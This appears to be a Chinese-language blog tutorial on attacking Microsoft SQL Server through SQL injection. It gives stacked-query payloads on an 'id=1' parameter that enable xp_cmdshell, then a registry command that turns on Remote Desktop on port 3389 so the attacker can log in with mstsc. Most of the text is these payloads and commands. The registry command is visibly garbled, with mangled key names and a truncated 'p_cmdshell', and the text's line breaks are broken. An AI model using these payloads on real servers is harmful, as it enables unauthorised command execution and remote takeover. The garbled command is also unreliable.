2023年12月6日发(作者:)

SQL注入篇——利用SqlServer执行系统命令连接远程桌面

我们用到的函数是

xp_cmdshell

利用此存储过程可以直接执行系统命令。

一、确立连接

输入

IP+/?id=1

出现如下界面说明连接成功

二、使用

master

表开启xp_cmdshell服务

输入下列语句开启服务:

id=1;

use master;

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

关闭服务:

id=1;

use master;

-- EXEC sp_configure 'show advanced options', 0; //

关完

xp

把这个注释解开

,

再执行

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 0; //

先关闭这里把

1

改成

0

,执行

RECONFIGURE;

开启3389端口,连接远程桌面

id=1;

use master;

p_cmdshell "REG ADD HKLMISYSTEMCurrentControlSetlControNTerminal" "Server Iv fDenyTSConnections /t REG_ DWORD /d 0 /f"

在虚拟机终端输入

netstat -ano

查看端口,看到3389执行成功

键盘Win+R打开命令行窗口、输入

mstsc

打开远程桌面

输入目标IP连接

点击

更多选项

使用其他账户

输入目标机的

登录用户名

和密码即可

成功。